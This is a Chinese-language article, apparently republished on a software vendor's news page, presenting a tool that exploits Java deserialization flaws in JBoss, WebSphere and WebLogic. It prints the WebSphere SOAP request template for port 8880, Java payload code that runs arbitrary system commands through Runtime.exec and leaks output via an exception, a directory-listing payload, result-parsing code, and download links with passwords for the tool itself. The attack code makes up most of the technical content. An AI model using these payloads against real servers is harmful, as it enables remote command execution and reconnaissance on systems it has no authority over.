您当前位置:首页 > 资讯中心 > 业内新闻

Java反序列化集成工具

0X00 概述

Java反序列化漏洞已经被曝出一段时间了,本人参考了网上大神的放出来的工具,将Jboss、Websphere和weblogic的反序列化漏洞的利用集成到了一起。其实,WebSphere的利用过程也和JBoss差不多,只不过在发送Payload和解析结果的时候多了个Base64编码(解码)的过程。

Java反序列化集成工具

本工具暂时支持的功能:

1、本地命令执行并回显,无须加载外部jar包,支持纯内网环境检测。

2、支持JBoss、WebSphere和Weblogic的反序列化漏洞检测。

3、支持https数据传输。

4、支持文件目录列表。

0X01 WebSphere的反序列化漏洞利用过程

WebSphere的反序列化漏洞发生的位置在SOAP的通信端口8880,使用的通信协议是https,发送的数据是XML格式的数据。


  1. <?xml version='1.0'encoding='UTF-8'?> 
  2.   <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  3.   <SOAP-ENV:Header xmlns:ns0="admin" ns0:WASRemoteRuntimeVersion="8.5.5.1" ns0:JMXMessageVersion="1.2.0" ns0:SecurityEnabled="true" ns0:JMXVersion="1.2.0">
  4.   <LoginMethod>BasicAuth</LoginMethod>
  5.   </SOAP-ENV:Header>
  6.   <SOAP-ENV:Body>
  7.   <ns1:getAttribute xmlns:ns1="urn:AdminService" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
  8.   <objectname xsi:type="ns1:javax.management.ObjectName">Base64(payload)</objectname>
  9.   <attribute xsi:type="xsd:string">ringBufferSize</attribute>
  10.   </ns1:getAttribute>
  11.   </SOAP-ENV:Body>
  12.   </SOAP-ENV:Envelope>

将我们构造的执行命令的payload通过base64编码后放在objectname节点中,通过https发送到服务器端,服务器端调用相应的执行函数,将结果发送给客户端,同样的,返回的数据也是经过base64编码的。WebSphere的Payload和JBoss的基本一致。如下是执行命令的payload。


  1. public RunCommand(String command) throws Exception  
  2.    {  
  3.            Process proc = Runtime.getRuntime().exec(command);  
  4.            BufferedReader br = new BufferedReader(new InputStreamReader(proc.getInputStream()));  
  5.            StringBuffer sb = new StringBuffer();  
  6.            String line;  
  7.            while ((line = br.readLine()) != null)  
  8.            {  
  9.                sb.append(line).append("\n");  
  10.            }  
  11.            String result = "\r\n\r\n==========" + sb.toString() + "==========\r\n";  
  12.            br.close();  
  13.            Exception e=new Exception(result);  
  14.            throw e;  
  15.    } 

将命令执行结果以字符隔开,这样在客户端获取数据后,可通过split、substring等方法对命令的执行结果进行解析。解析命令的源码如下:


  1. public static String parseResult(String result)  
  2.    {  
  3.    String tmp=result.split("<faultstring>")[1];  
  4.    String reString=tmp.split("</faultstring>")[0];  
  5.    String resultTmp=new String(Base64.getDecoder().decode(reString));  
  6.    int x1=resultTmp.indexOf("==========")+10;  
  7.    int x2=resultTmp.lastIndexOf("==========")-1;  
  8.    String returnValue="";  
  9.    if(x1>=0&&x2>=0)  
  10.    returnValue=resultTmp.substring(x1, x2).trim();  
  11.    else  
  12.    returnValue=resultTmp;  
  13.    return returnValue;  
  14.    } 

0X02 文件列表读取

获取文件列表的功能是通过Java的listRoot和listFiles来实现的,获取文件和目录列表的过程和命令执行大概相同。在这我就简单的描述一下过程:如果传入方法的是一个空值,那么就通过Files.listRoot获取根目录或者驱动器列表,否则,传入的值是路径的话,就通过file.listFiles方法获取目录下的所有文件和目录,将获取到的目录名放到{}中,将文件名放在[]中,这样,就方便我们在程序中对获取到的数据进行解析。

获取目录的payload代码如下:


  1. public GetFileList(String fileName) throws Exception  
  2.     {  
  3.     StringBuilder sb=new StringBuilder();  
  4.     String result=new String();  
  5.     if(fileName.isEmpty())  
  6.     {  
  7.     File[] files=File.listRoots();  
  8.     for(int i=0;i<files.length;i++)  
  9.     {  
  10.     sb.append(files[i].getAbsolutePath()).append(",");  
  11.     }  
  12.     result="{"+sb.toString().substring(0,sb.toString().length()-1)+"}";  
  13.     }  
  14.     else  
  15.     {  
  16.     File file=new File(fileName);  
  17.     StringBuilder dirList=new StringBuilder();  
  18.     StringBuilder fileList=new StringBuilder();  
  19.     if(file.isDirectory())  
  20.     {  
  21.     File[] list=file.listFiles();  
  22.     dirList.append("{");  
  23.     fileList.append("[");  
  24.     for(int i=0;i<list.length;i++)  
  25.     {  
  26.     if(list[i].isDirectory())  
  27.     dirList.append(list[i].getAbsolutePath()).append(",");  
  28.     else  
  29.     fileList.append(list[i].getAbsolutePath()).append(",");  
  30.     }  
  31.     }  
  32.     if(!dirList.toString().isEmpty())  
  33.     sb.append(dirList.toString().substring(0,dirList.toString().length()-1)).append("}");  
  34.     if(!fileList.toString().isEmpty())  
  35.     sb.append(fileList.toString().substring(0,fileList.toString().length()-1)).append("]");  
  36.     result=sb.toString();  
  37.     }  
  38.     result="\r\n\r\n==========\r\n"+result+"\r\n==========\r\n";  
  39.     Exception e=new Exception(result);  
  40.             throw e;  
  41.     } 

解析的时候,先将执行结果分离出来,再对结果base64解码,再进一步区分目录和文件,分别添加到界面的目录树中。

注:设计时为了美观,使用了JavaFX来设计界面,运行时需要JDK1.8环境。

程序运行效果如下:

Java反序列化集成工具

 

工具下载地址:http://pan.baidu.com/s/1sjXjsBz 密码: b423

2016.1.5 工具更新内容:

地址: http://pan.baidu.com/s/1jGSEFFS 密码: si6t

1.多线程处理任务,解决命令执行过程中界面无法响应的问题

2.[Bug Fix]weblogic console端口改为80时无法获取数据

3.[Bug Fix]weblogic较早次获取信息或执行命令响应时间过长的问题

作者:Grabsun - 发布时间:2016-01-07 - 点击量:5755
公司简介:大势至公司是国内较早的企业网管软件提供商,可以为企事业单位提供整体的企业网络管理方案和企业网络管理平台,通过全系列的公司监控员工电脑软件教你如何控制员工上网、如何控制局域网内电脑上网以及如何保护电脑文件安全等。公司核心产品“聚生网管系统”是一款专门的公司网管必备软件、查看网络流量软件、网络流量监控软件和办公室电脑监控软件;“网络特警”则是一款专门的网络流量监控设备、上网行为管理服务器、网络行为管理设备,可以实现更为强大的局域网网络行为管理;大势至USB接口禁用软件则是一款专门的数据防泄密产品、屏蔽U盘软件、电脑USB端口禁用软件,可以严防通过一切途径泄露电脑文件,保护单位无形资产和商业机密安全;大势至共享文件夹管理软件则是一款专门的共享文件权限设置软件和共享文件设置密码软件,全面保护共享文件安全;大势至共享文件审计系统则是一款专门的服务器共享文件夹设置软件、服务器共享文件访问日志记录软件,可以详细记录局域网用户访问共享文件的行为,更好地管理共享文件的安全;大势至局域网网络准入控制系统则是一款专门防止未经授权的电脑接入公司局域网的行为,防止外来电脑访问局域网共享文件、防止蹭网以及绑定IP和MAC地址,保护网络安全;大势至FTP服务器日志记录软件则是一款专门记录局域网用户访问FTP服务器日志的软件,可以有效保护FTP服务器文件安全。
联系我们